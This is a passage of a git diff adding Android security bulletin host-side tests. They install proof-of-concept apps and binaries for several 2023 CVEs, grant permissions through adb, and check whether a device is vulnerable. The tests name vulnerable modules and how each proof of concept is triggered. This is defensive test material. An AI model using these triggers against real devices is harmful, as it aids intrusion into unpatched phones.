+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
new file mode 100644
index 0000000..8e815fa
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21129 extends NonRootSecurityTestCase {
+
+ // b/274759612
+ // Vulnerable app : SystemUI.apk
+ // Vulnerable module : com.android.systemui
+ @AsbSecurityTest(cveBugId = 274759612)
+ @Test
+ public void testPocCVE_2023_21129() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21129";
+
+ // install the app
+ installPackage("CVE-2023-21129.apk");
+
+ // give permission to post bubble notifications
+ AdbUtils.runCommandLine("cmd notification set_bubbles " + testPkg + " 1", getDevice());
+
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testBubbleNotification");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
new file mode 100644
index 0000000..064cfbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21144 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 252766417)
+ @Test
+ public void testPocCVE_2023_21144() {
+ ITestDevice device = null;
+ try {
+ device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21144";
+ installPackage("CVE-2023-21144.apk", "-g");
+
+ // Allowing notification listener service for PocListenerService
+ device.executeShellCommand(
+ "cmd notification allow_listener " + testPkg + "/.PocListenerService");
+
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21144");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ // To undo the expanded notification panel
+ try {
+ device.executeShellCommand("input keyevent KEYCODE_HOME");
+ } catch (Exception ignore) {
+ // Ignore
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
new file mode 100644
index 0000000..8c44a58
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.ProcessUtil;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Optional;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21145 extends NonRootSecurityTestCase {
+ private final int mNoPidFound = -1; /* Default pid */
+
+ @AsbSecurityTest(cveBugId = 265293293)
+ @Test
+ public void testPocCVE_2023_21145() {
+ try {
+ ITestDevice device = getDevice();
+
+ // Install poc and start PipActivity to invoke the vulnerability
+ installPackage("CVE-2023-21145.apk");
+ String pocPkg = "android.security.cts.CVE_2023_21145";
+ device.executeShellCommand("am start-activity " + pocPkg + "/.PipActivity");
+
+ // Wait for the PoC to start
+ final int initialPid = waitAndGetPid(device, mNoPidFound /* initial pid */);
+ assumeTrue("PoC process did not start", initialPid != mNoPidFound);
+
+ // Wait for the PoC to be killed or restart
+ final int latestPid = waitAndGetPid(device, initialPid);
+ assumeTrue("PoC process did not die", latestPid != initialPid);
+
+ // Without fix, the process restarts with new pid
+ assertTrue("Device is vulnerable to b/265293293 !!", latestPid == mNoPidFound);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private int waitAndGetPid(ITestDevice device, int initialPid) throws Exception {
+ final long timeout = 10_000L;
+ final String processName = "android.security.cts.CVE_2023_21145:pipActivity";
+
+ // Check if pid has changed
+ int currentPid = mNoPidFound;
+ long startTime = System.currentTimeMillis();
+ while ((currentPid == mNoPidFound || currentPid == initialPid) // Check if pid has changed
+ && System.currentTimeMillis() - startTime <= timeout) {
+ Optional<Integer> pid = ProcessUtil.pidOf(device, processName);
+ currentPid = pid.isPresent() ? pid.get() : mNoPidFound;
+ RunUtil.getDefault().sleep(200); // Sleep for 200 ms before checking pid again
+ }
+ return currentPid;
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
new file mode 100644
index 0000000..714ace8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21238 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277740848)
+ @Test
+ public void testPocCVE_2023_21238() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21238";
+
+ // Install test app in device
+ installPackage("CVE-2023-21238.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21238_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21238");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
new file mode 100644
index 0000000..986aee3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21239 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 274592467)
+ @Test
+ public void testPocCVE_2023_21239() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21239";
+ installPackage("CVE-2023-21239.apk", "-g");
+
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21239_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCallStyleNotification");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
new file mode 100644
index 0000000..c784851
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21244 extends NonRootSecurityTestCase {
+
+ // b/276729064
+ // Vulnerable module : framework.jar (Notification)
+ // Vulnerable app : Not applicable
+ @AsbSecurityTest(cveBugId = 276729064)
+ @Test
+ public void testPocCVE_2023_21244() {
+ try {
+ ITestDevice device = getDevice();
+
+ // Install the test app
+ installPackage("CVE-2023-21244.apk", "-g");
+
+ // Enable "hidden_api_policy" to use the hidden APIs of the class RemoteInputHistoryItem
+ // and run the test with a new user
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21244_user")
+ .withUser();
+ AutoCloseable withHiddenPolicy =
+ SystemUtil.withSetting(device, "global", "hidden_api_policy", "1")) {
+ // Run the test "testCVE_2023_21244"
+ final String testPkg = "android.security.cts.CVE_2023_21244";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21244");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
new file mode 100644
index 0000000..957c459
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.tradefed.util.CommandStatus.SUCCESS;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.CommandResult;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21253 extends NonRootSecurityTestCase {
+ private final List<String> mAssumptionFailureList = new ArrayList<String>();
+ private final List<String> mFailureList = new ArrayList<String>();
+
+ @AsbSecurityTest(cveBugId = 266580022)
+ @Test
+ public void testPocCVE_2023_21253() {
+ try {
+ // Prebuilt apks used in this test are same as used in ApkVerifierTest.java. Dependence
+ // on prebuilt apks cannot be removed because with fix, apks with more than 10 signers
+ // cannot be built due to changes done in 'apksigner'.
+ final String v1Only10SignersApk = "v1-only-10-signers.apk";
+ final String v1Only11SignersApk = "v1-only-11-signers.apk";
+ final String v2Only10SignersApk = "v2-only-10-signers.apk";
+ final String v2Only11SignersApk = "v2-only-11-signers.apk";
+
+ // Check V1 apk signature scheme
+ checkApkSignerScheme(v1Only10SignersApk, v1Only11SignersApk, "V1 apk signature");
+
+ // Check V2 apk signature scheme
+ checkApkSignerScheme(v2Only10SignersApk, v2Only11SignersApk, "V2 apk signature");
+
+ // Fail the test if any failure strings are present in mFailureList
+ assertTrue(
+ format(
+ "Vulnerable to b/266580022! Failures are :- %s",
+ mFailureList.toString()),
+ mFailureList.isEmpty());
+
+ // Assumption failure if any exception messages are present in mAssumptionFailureList
+ assumeTrue(
+ format("Exceptions occurred :- %s", mAssumptionFailureList.toString()),
+ mAssumptionFailureList.isEmpty());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private void checkApkSignerScheme(
+ String apkWith10Signers, String apkWith11Signers, String apkSignerScheme) {
+ try {
+ final CommandResult outputV1Only10 = installAndCheck(apkWith10Signers);
+ final CommandResult outputV1Only11 = installAndCheck(apkWith11Signers);
+ if (outputV1Only10.getStatus() != SUCCESS) {
+ // outputV1Only10 should be successful as it is expected that installation of an apk
+ // with 10 signers should be allowed
+ mAssumptionFailureList.add(
+ format("Unable to install app %s with 10 signatures", apkWith10Signers));
+ return;
+ }
+ if (outputV1Only11.getStatus() == SUCCESS) {
+ // Add scheme to mFailureList if installation of an apk with 11 signers is
+ // successful
+ mFailureList.add(
+ format(
+ "%s scheme allows installation of apk %s with more than 10 signers",
+ apkSignerScheme, apkWith11Signers));
+ }
+ } catch (Exception e) {
+ // Add exception occurred in mAssumptionFailureList. This is done to avoid test
+ // termination midway and ensure that both the schemes are checked
+ mAssumptionFailureList.add(
+ format(
+ "Exception %s occurred while checking %s apk signer scheme",
+ e.getMessage(), apkSignerScheme));
+ }
+ }
+
+ private CommandResult installAndCheck(String apkName) throws Exception {
+ final ITestDevice device = getDevice();
+ final String apkPath = AdbUtils.TMP_PATH + apkName;
+ try {
+ // Push apk file to /data/local/tmp
+ AdbUtils.pushResource(AdbUtils.RESOURCE_ROOT + apkName, apkPath, device);
+
+ // Install apk
+ return device.executeShellV2Command("pm install " + apkPath);
+ } finally {
+ // Uninstall apk
+ device.executeShellV2Command("pm uninstall android.appsecurity.cts.tinyapp");
+
+ // Remove apk file from /data/local/tmp
+ AdbUtils.removeResources(new String[] {apkName}, AdbUtils.TMP_PATH, device);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
new file mode 100644
index 0000000..0155a9d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21254 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 254736794)
+ @Test
+ public void testPocCVE_2023_21254() {
+ try {
+ // Install test-app and helper-app
+ installPackage("CVE-2023-21254-test.apk");
+ installPackage("CVE-2023-21254-helper.apk");
+
+ // Run Device test
+ final String testPkg = "android.security.cts.CVE_2023_21254_test";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21254");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
new file mode 100644
index 0000000..b367055
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.DeviceTestRunOptions;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21256 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 268193384)
+ @Test
+ public void testPocCVE_2023_21256() {
+ ITestDevice device = null;
+ int workUserId = -1;
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21256";
+ device = getDevice();
+
+ assumeTrue(device.isMultiUserSupported());
+
+ AdbUtils.runCommandLine(
+ "pm create-user --profileOf 0 --managed CVE_2023_21256_work_user", device);
+
+ Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+ for (UserInfo userInfo : mapOfUserInfos.values()) {
+ if (userInfo.userName().equals("CVE_2023_21256_work_user")) {
+ workUserId = userInfo.userId();
+ }
+ }
+ assumeFalse(workUserId == -1);
+
+ assumeTrue(device.startUser(workUserId, true /* waitFlag */));
+
+ // Install the test app in work profile
+ installPackage("CVE-2023-21256.apk", "--user " + workUserId);
+
+ runDeviceTests(
+ new DeviceTestRunOptions(testPkg)
+ .setDevice(device)
+ .setTestClassName(testPkg + ".DeviceTest")
+ .setTestMethodName("testSettingsHomePageActivityFromWorkProfile")
+ .setUserId(workUserId));
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ if (workUserId != -1) {
+ try {
+ device.stopUser(workUserId, true /* waitFlag */, true /* forceFlag */);
+ device.removeUser(workUserId);
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
new file mode 100644
index 0000000..175d914
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21260 extends NonRootSecurityTestCase {
+
+ // b/259384309
+ // Vulnerable module : CarSettings.apk
+ @AsbSecurityTest(cveBugId = 259384309)
+ @Test
+ public void testPocCVE_2023_21260() {
+ try {
+ final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + FEATURE_AUTOMOTIVE + " missing",
+ hasDeviceFeature(FEATURE_AUTOMOTIVE));
+ final String testPkg = "android.security.cts.CVE_2023_21260";
+
+ // Install the test app
+ installPackage("CVE-2023-21260.apk");
+
+ // Run the test "testCVE_2023_21260"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21260");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
new file mode 100644
index 0000000..d2c57f8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+// CVE-2023-21261 includes fix for CVE-2022-27406.
+// Hence checking for both the vulnerabilties
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21261 extends NonRootSecurityTestCase {
+
+ // b/271680254
+ // Vulnerability Behaviour : SIGSEGV in self
+ // Vulnerable Library : libft2.so (As per AOSP code)
+ // Vulnerable Function : FT_Request_Size (As per AOSP code)
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 271680254)
+ @Test
+ public void testPocCVE_2023_21261() {
+ try {
+ String binaryName = "CVE-2023-21261";
+ String inputFile = "cve_2023_21261.ttf";
+
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binaryName)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern("libft2.so", "FT_Request_Size"))
+ .setSignals(TombstoneUtils.Signals.SIGSEGV)
+ .setIgnoreLowFaultAddress(false);
+
+ // Running the PoC for CVE-2022-27406
+ NativePoc.builder()
+ .pocName(binaryName)
+ .args("CVE-2022-27406", inputFile)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
new file mode 100644
index 0000000..0c4f2a2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21272 extends NonRootSecurityTestCase {
+
+ // b/227471459
+ // Vulnerable module : framework.jar
+ @AsbSecurityTest(cveBugId = 227471459)
+ @Test
+ public void testPocCVE_2023_21272() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21272_test";
+
+ // Install the helper app
+ installPackage("CVE-2023-21272-helper.apk");
+
+ // Install the test app
+ installPackage("CVE-2023-21272-test.apk");
+
+ // Run the test "testCVE_2023_21272"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21272");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // return to Home screen after test run
